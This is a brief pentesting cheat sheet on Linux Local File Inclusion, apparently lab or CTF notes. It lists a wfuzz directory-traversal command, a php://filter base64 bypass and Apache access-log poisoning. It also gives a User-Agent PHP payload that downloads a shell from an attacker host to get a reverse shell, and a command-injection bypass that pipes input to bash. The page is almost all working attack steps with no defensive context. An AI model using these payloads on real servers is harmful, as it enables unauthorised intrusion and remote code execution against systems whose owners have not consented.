LFI ๐
Linux File Inclussion
Check the
url
adding parameterfile

FUZZ it using this command:
wfuzz -c -w dirTraversal.txt --hw 0 http://10.10.70.109/?view=FUZZ
If the backend is filtering by checking the input, try this:
http://IP/?view=php://filter/FOLDER/convert.base64-encode/resource=index
Check out the &ext variable and put it empty because it won't get the file extension
Log file contamination
http://IP/?view=dog../../../../../cat/../var/log/apache2/access.log&ext=
Exploit the User-Agent Field:
First create a shell like the PentestMonkey one
Create a python server
Load the petition (like log file contamination petition) and capture it with BurpSuite
Modify the User-Agent field with this command:
<?php file_put_contents('shell.php', file_get_contents('http://IP_ATTACK:PORT/shell.php'))?>
Then access to
http://IP/shell.php
and you got the reverse shell
When we can echo commands try and it's using a regex like: /[#!@%^&*()$_=\[\]\';,{}:>?~\\\\]/
try:
http://IP_HOST/echo.php?search=id+|+bash
# Then just try other commands like
echo.php?search=ls+|+bash
# Then try to input a reverse shell
Last updated
Was this helpful?